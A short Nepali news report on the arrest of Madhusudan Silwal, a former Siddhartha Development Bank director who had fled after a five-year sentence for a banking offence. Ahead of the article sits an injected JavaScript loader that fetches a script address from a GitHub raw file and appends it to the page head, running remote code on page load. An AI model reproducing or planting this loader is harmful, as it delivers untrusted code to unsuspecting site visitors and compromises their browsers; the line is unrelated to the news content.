;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
काठमाडौं । सिद्धार्थ डेलभपमेन्ट बैंकका तत्कालीन संचालक मधुसुदन सिलवाल पक्राउ परेका छन् । केन्द्रीय अनुसन्धान व्युरोबाट खटिएको टोलीले उनलाई बानेश्वरबाट पक्राउ गरेको व्युरोका डिआईजी सहकुल थापाले जानकारी दिए ।
बैंकिङ कसुर मुद्धामा उच्च अदालत पाटनले उनलाई दोषी ठहर गर्दै ५ वर्ष कैद र १ करोड जरिवाना गर्ने फैसला गरेको थियो ।
०७३ मा अदालतले सिलवालको ३० लाख धरौटी जफत हुने फैसला गरेको थियो । मुद्दा फैसलापछि ५६ वर्षीय सिलवाल फरार थिए ।
फेसबुक प्रतिक्रियाहरु